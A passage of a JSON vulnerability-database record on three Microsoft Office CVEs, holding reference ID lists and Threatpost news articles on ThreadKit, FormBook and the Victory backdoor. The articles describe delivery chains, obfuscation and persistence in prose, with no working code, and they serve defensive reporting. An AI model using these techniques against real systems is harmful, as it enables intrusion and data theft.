"THREATPOST:7F86D903184A4B5AF689693F5950FB7D", "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "THREATPOST:80978215EBC2D47937D2F3471707A073", "THREATPOST:809BED35A98A53099CE1EC723FA950F2", "THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16", "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "THREATPOST:8A24910206DA1810DAD81ABA313E33A7", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "THREATPOST:8FAA8C7C7378C070F0011A0B44C03726", "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "THREATPOST:90355E85731E1618F6C63A58CD426966", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:945830C59DF62627CC3D29C4F9E9139F", "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "THREATPOST:95C6723464FA4BDF541640AC24DD5E35", "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "THREATPOST:96B85F971B8102B581B91984548004F2", "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "THREATPOST:9758835CBD1761636E1E39F36A79936B", "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "THREATPOST:985009AC9680D632153D78707A8949EF", "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:9DAD31CF008CF12C5C4A4EA19C77BB66", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:9FE968913EDA58B2C622DFD4433C05E0", "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C0A58646680EABD23F9ABE6CC20F9F2E", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:D11D4E32822220251B14068F9BAAD17E", "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "THREATPOST:D58796CB8261B361ADF389131F955AE3", "THREATPOST:D5CE687F92766745C002851DFA8945DE", "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "THREATPOST:E067CFBFA163616683563A8ED34648FE", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "THREATPOST:E46805A1822D16B4725517D4B8786F57", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:E539817E8025A93279C63158F37F2DFB", "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "THREATPOST:E7C5C8276111C637456F053327590E4C", "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034", "TRENDMICROBLOG:E671F1DA89C14989CDFAEB298B71BF9D"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119", "1337DAY-ID-29976"]}]}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "canvas", "idList": ["OFFICE_WSDL"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0018"]}, {"type": "cisa", "idList": ["CISA:D70586B2C2D5D982D54DA686CCF0F4D1"]}, {"type": "cve", "idList": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07"]}, {"type": "fireeye", "idList": ["FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "kaspersky", "idList": ["KLA11069", "KLA11139", "KLA11170"]}, {"type": "krebs", "idList": ["KREBS:4F19DF7091060B198B092ABE2F7E1AA8"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2017-8570", "MS:CVE-2018-0802"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011604", "KB4011618", "KB4011643"]}, {"type": "mssecure", "idList": ["MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201788439", "MYHACK58:62201788542", "MYHACK58:62201892253"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_JAN_OFFICE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811231", "OPENVAS:1361412562310811232", "OPENVAS:1361412562310811233", "OPENVAS:1361412562310811451", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:97274435F9F49556ED060635FD9081E2"]}, {"type": "securelist", "idList": ["SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:F1FC61836DCAA7F1E27411092B208523"]}, {"type": "symantec", "idList": ["SMNTC-99445"]}, {"type": "talosblog", "idList": ["TALOSBLOG:7FDC117533451294884ABE03F31ED36B", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46"]}, {"type": "thn", "idList": ["THN:6885760BEEB9A6CBDFB108443DDF540C", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:ED087560040A02BCB1F68DE406A7F577"]}, {"type": "threatpost", "idList": ["THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:398FE2F38E44124BA0EA52EBFDD9FBD9", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034", "TRENDMICROBLOG:E671F1DA89C14989CDFAEB298B71BF9D"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-11882", "epss": "0.974500000", "percentile": "0.998960000", "modified": "2023-03-15"}, {"cve": "CVE-2017-8570", "epss": "0.974710000", "percentile": "0.999270000", "modified": "2023-03-15"}, {"cve": "CVE-2018-0802", "epss": "0.974950000", "percentile": "0.999500000", "modified": "2023-03-15"}], "vulnersScore": -0.4}, "_state": {"dependencies": 1678917980, "score": 1683995507, "epss": 1678938645}, "_internal": {"score_hash": "2c14fc0f158f3a507ddc6bfa14cc4dc8"}}

{"threatpost": [{"lastseen": "2019-11-04T07:15:20", "description": "Despite the high profile arrest earlier this year of the Cobalt Group ringleader, the threat actors behind the hacking collective are slowly ramping up their malicious behavior. In a new analysis of the threat group, known for its widespread attacks against banks in Eastern Europe over the past several years, the Cobalt Group has recently been observed updating its arsenal with a new version of the ThreadKit malware.\n\nIn a report [issued by security firm Fidelis on Tuesday](<https://www.fidelissecurity.com/sites/default/files/CobaltGroup_nov2018.pdf>) (PDF), researchers outline a number of new developments including:\n\n * Despite an arrest earlier this year of a key member, of the Cobalt Group remains active.\n * A new version on the malware ThreadKit is being actively distributed in October 2018.\n * The CobInt trojan uses a XOR-based obfuscation technique.\n\n## Reemergence of Cobalt Group\n\nThe Cobalt Group first appeared in 2013 and in 2016 made a name for itself with widespread attacks on banks and ATM jackpotting campaigns across Europe. In one single campaign, it was credited for stealing over $32,000 from six Eastern Europe ATMs. In the following years the Cobalt Group expanded its focus to include financial-sector phishing schemes and new regions, including North and South America.\n\nIn March, the Cobalt Group was dealt a severe blow when the EUROPOL [announced](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) the arrest of the \u201ccriminal mastermind\u201d behind the group in Alicante, Spain. Since then, the group [was observed by Positive Technology](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>) in May as the criminals behind a spear phishing campaign directed at the financial sector that had the goal of enticing victims to download a JavaScript backdoor.\n\n\u201cIn 2017 they expanded their targets from banks to include supply chain companies, financial exchanges, investment funds, and lenders in North America, Western Europe, and South America. Tools used in 2017 included [PetrWrap](<https://threatpost.com/new-petya-distribution-vectors-bubbling-to-surface/126577/>), more_eggs, CobInt and ThreadKit,\u201d wrote Jason Reaves, principal, threat research with the Fidelis Threat Research Team in the report.\n\n**ThreadKit 2.0 **\n\nAfter the arrest of Cobalt Group\u2019s leader, in May the group was spotted changing up its tactics. To that end, the Cobalt Group began focusing on exploits used for remote code execution found in Microsoft Word ([CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>)) and one notably being [the now patched April 2017 zero-day bug](<https://threatpost.com/microsoft-patches-word-zero-day-spreading-dridex-malware/124906/>) ([CVE-2017-0199](<https://threatpost.com/microsoft-patches-three-vulnerabilities-under-attack/124927/>)).\n\n\u201cIn October 2018, [we] identified a new version of ThreadKit. As per Cobalt Group\u2019s typical methods, the malware was delivered via phishing email, containing a RFT Microsoft Office attachment which contained an evolved version of the exploit builder kit first uncovered in October 2017,\u201d according to Fidelis. \u201c[This] new version of ThreadKit [utilizes] a macro delivery framework sold and used by numerous actors and groups.\u201d\n\nFidelis\u2019 latest analysis of the ThreadKit also notes \u201ca slight evolution\u201d in the exploit kit designed to better hide from detection. Obfuscation techniques include \u201cplacing the \u2018M\u2019 from the \u2018MZ\u2019 of an executable file into it\u2019s own object and now renaming a number of the objects inside.\u201d\n\nFidelis also pointed out the update including a new download URL where the malware code \u201cobjects\u201d are downloaded from and later combined to create the executable. \u201cA few highlights from the embedded files shows a check for block.txt, which is similar to the previous version\u2019s kill-switch implementation,\u201d Reaves wrote.\n\n**CobInt Adopts New Obfuscation Skills **\n\nThe ThreadKit payload is the trojan Coblnt, a longtime favorite of the Cobalt Group. To further frustrate analysis and detection, the attackers added another layer of obfuscation, a XOR routine used to decode the initial Coblnt payload. A XOR, or XOR cipher, is an encryption algorithm that operates on a set of known principles. Encryption and decryption can be performed by applying and reapplying the XOR function.\n\n\u201cWhat\u2019s interesting here is that the XOR key is replaced by the subtraction value and the subtraction value is replaced by the previously read DWORD value. So the only value that\u2019s needed is the hardcoded XOR key, meaning mathematically this entire thing can be solved using a theorem prover such as Z3,\u201d researchers pointed out.\n\nThe decoded payload is the CobInt DLL, which when loaded will \u201csit in a loop beaconing to its C2 and waiting for commands and modules to be executed,\u201d according to Fidelis.\n\nFidelis and other researchers say the arrest of Cobalt group members have only temporarily slowed Carbanak/Cobalt threat actors. In a recent analysis by Kaspersky Lab, researchers said Cobalt arrests have only emboldened members and hastened the process of [splitting the groups into smaller cells](<https://securelist.com/ksb-cyberthreats-to-financial-institutions-2019-overview-and-predictions/88944/>).\n", "cvss3": {}, "published": "2018-12-11T18:40:00", "type": "threatpost", "title": "Cobalt Group Pushes Revamped ThreadKit Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-12-11T18:40:00", "id": "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "href": "https://threatpost.com/cobalt-threadkit-malware/139800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:50:17", "description": "A new wave of document attacks targeting inboxes do not require enabling macros in order for adversaries to trigger an infection chain that ultimately delivers FormBook malware.\n\nResearchers at Menlo Security are reporting a wave of attacks that began last month that are targeting financial and information service sectors in the Middle East and United States. The method of infection includes a new multi-stage infection technique.\n\nThe company, which released details of the method Monday, said that attacks are adept at evading security solutions such as sandboxes and AV solutions, which fail when there is no malicious content or rogue links in a document to detect.\n\n\u201cThe absence of active code or shellcode in the first stage malicious document, which was sent as an email attachment, is noteworthy because this attack relies on a remotely-hosted malicious object,\u201d said Vinay Pidathala, director of security research at Menlo Security.\n\nResearchers said attackers are exploiting \u201cdesign flaws\u201d in the document formats .docx and RTF, in combination with abusing unpatched instances of a remote code execution vulnerability [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8570>) [\u2013 patched in July 2017](<https://threatpost.com/microsoft-patch-tuesday-update-fixes-19-critical-vulnerabilities/126758/>).\n\nThe first stage of the attack is the most significant and unique aspect of the malware infection chain, according to researchers. It involves a spam email and an attached .docx file. The Word document utilizes Framesets. \u201cFramesets are HTML tags and contain frames responsible for loading documents,\u201d described the researcher.\n\nWhen the document is simply viewed in Microsoft Office \u201cEdit\u201d mode (and not the default \u201cProtected\u201d mode), an embedded frame points to a TinyURL defined in the document\u2019s webSettings.xml.rels file. A \u201c.rels\u201d file contains information about how different parts of a Microsoft Office document fit together, according to a [description on File.org](<https://file.org/extension/rels>).\n\n\u201cIf a victim opens the malicious first stage document, Microsoft Word makes an HTTP request to download the object pointed to by the URL and renders it within the document,\u201d according to Menlo Security.\n\nIn the case of the rogue document, the TinyURL points to command-and-control (C2) server domains located in France and the United States that download a malicious RTF file.\n\nAccording to Pidathala, it is this first stage of the attack that is unique. The rest of the attack, he said, is fairly common and one currently used in a number of recent attacks by cybercriminals behind the Cobalt group to deliver FormBook and other types of malware.\n\n\u201cA design behavior occurs in RTF documents, when an RTF document with an embedded Package object is opened, the embedded object is automatically dropped to the %TEMP% directory of Windows. This technique was also used by the threat actors behind the Cobalt group that used [CVE-2017-11882](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>),\u201d wrote researchers noting a recent spike in attacks [using the CVE](<https://www.proofpoint.com/us/threat-insight/post/unraveling-ThreadKit-new-document-exploit-builder-distribute-The-Trick-Formbook-Loki-Bot-malware>).\n\nThe vulnerability CVE-2017-11882 is the remote code execution bug patched last November located in an Office executable called Microsoft Equation Editor. But instead of taking advantage of that vulnerability, the most recent attacks identified by Menlo Security take advantage of the vulnerability [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8570>).\n\nThe vulnerability CVE-2017-8570 is a remote code execution vulnerability in Microsoft Office tied to the way the software suite handles objects in memory.\n\n\u201cFor the attack to succeed, this executable still needs to be executed. And, that\u2019s where the CVE-2017-8570 comes into play. CVE-2017-8570 executes the dropped object in the %TEMP% directory,\u201d researchers said.\n\nMenlo Security observed an embedded .sct (scriptlet) file dropped to the %TEMP% directory. \u201cWhen the .sct file is executed, the large amount of data is written to the %TEMP% directory with the name chris101.exe. Wscript.Shell.Run() method is then called with the path to the .exe to start the malicious executable,\u201d they said.\n\nNext, the malicious executable calls to the adversaries\u2019 C2 and downloads a third-stage downloader that drops the FormBook malware onto the targeted system.\n\nFormBook is a type of data-stealing malware used in espionage and is capable of keystroke logging, stealing clipboard contents and extracting data from HTTP sessions. Once installed, the malware can also execute commands from a command-and-control (C2) server such as instructing the malware to download more files, start processes, shutdown and reboot a system and steal cookies and local passwords.\n\nPidathala said he believes this attack technique exposes a larger attack surface. \u201cThere will be an uptick in malicious objects, where the malicious components are remotely hosted,\u201d he said.\n", "cvss3": {}, "published": "2018-04-09T18:35:39", "type": "threatpost", "title": "Word Attachment Delivers FormBook Malware, No Macros Required", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570"], "modified": "2018-04-09T18:35:39", "id": "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "href": "https://threatpost.com/word-attachment-delivers-formbook-malware-no-macros-required/131075/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-07T19:08:25", "description": "An ongoing surveillance operation has been uncovered that targets a Southeast Asian government, researchers said \u2013 using a previously unknown espionage malware.\n\nAccording to Check Point Research, the attack involves spear-phishing emails with malicious Word documents to gain initial access, along with the exploitation of older, known Microsoft Office security vulnerabilities. But most notable, researchers said, is the novel backdoor, which they said has been in development by a Chinese APT for at least three years.\n\nThe documents were \u201csent to different employees of a government entity in Southeast Asia,\u201d according to [the Check Point analysis](<https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/>). \u201cIn some cases, the emails are spoofed to look like they were from other government-related entities. The attachments to these emails are weaponized copies of legitimate looking official documents and use the remote template technique to pull the next stage from the attacker\u2019s server.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe malicious documents download a template from various URLs, according to the analysis, which are .RTF files embedded with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder. RoyalRoad is a tool that researchers have said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428; it generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe RoyalRoad-generated RTF document contains an encrypted payload and shellcode, according to the analysis.\n\n\u201cTo decrypt the payload from the package, the attacker uses the RC4 algorithm with the key 123456, and the resulted DLL file is saved as 5.t in the %Temp% folder,\u201d researchers said. \u201cThe shellcode is also responsible for the persistence mechanism \u2013 it creates the scheduled task named Windows Update that should run the exported function StartW from 5.t with rundll32.exe, once a day.\u201d\n\nThe .DLL gathers data on the victim\u2019s computer including the OS name and version, user name, MAC addresses of networking adapters and antivirus information. All of the data is encrypted and then sent to the attackers\u2019 command-and-control server (C2) via [GET HTTP request method](<https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/GET>). After that, a multi-stage chain eventually results in the installation of the backdoor module, which is called \u201cVictory.\u201d It \u201cappears to be a custom and unique malware,\u201d according to Check Point.\n\n## **Victory Backdoor**\n\nThe malware is built to steal information and provide consistent access to the victim. Check Point researchers said it can take screenshots, manipulate files (including creating, deleting, renaming and reading them), gather information on the top-level windows that are open, and shut down the computer.\n\nInterestingly, the malware appears to be related to previously developed tools.\n\n\u201cSearching for files similar to the final backdoor in the wild, we encountered a set of files that were submitted to VirusTotal in 2018,\u201d according to the analysis. \u201cThe files were named by the author as MClient and appear to be part of a project internally called SharpM, according to their PDB paths. Compilation timestamps also show a similar timeframe between July 2017 and June 2018, and upon examination of the files, they were found to be older test versions of our VictoryDll backdoor and its loaders chain.\u201d\n\nThe specific implementation of the main backdoor functionality is identical; and, the connection method has the same format, according to the firm. Also, MClient\u2019s connection XOR key and VictoryDll\u2019s initial XOR key are the same.\n\nHowever, there are differences between the two in terms of architecture, functionality and naming conventions. For instance, MClient features a keylogger, which is absent for Victory. And, Victory\u2019s exported function is named MainThread, while in all versions of the MClient variant the export function was named GetCPUID, according to Check Point.\n\n\u201cOverall, we can see that in these three years, most of the functionality of MClient and AutoStartup_DLL was preserved and split between multiple components \u2013 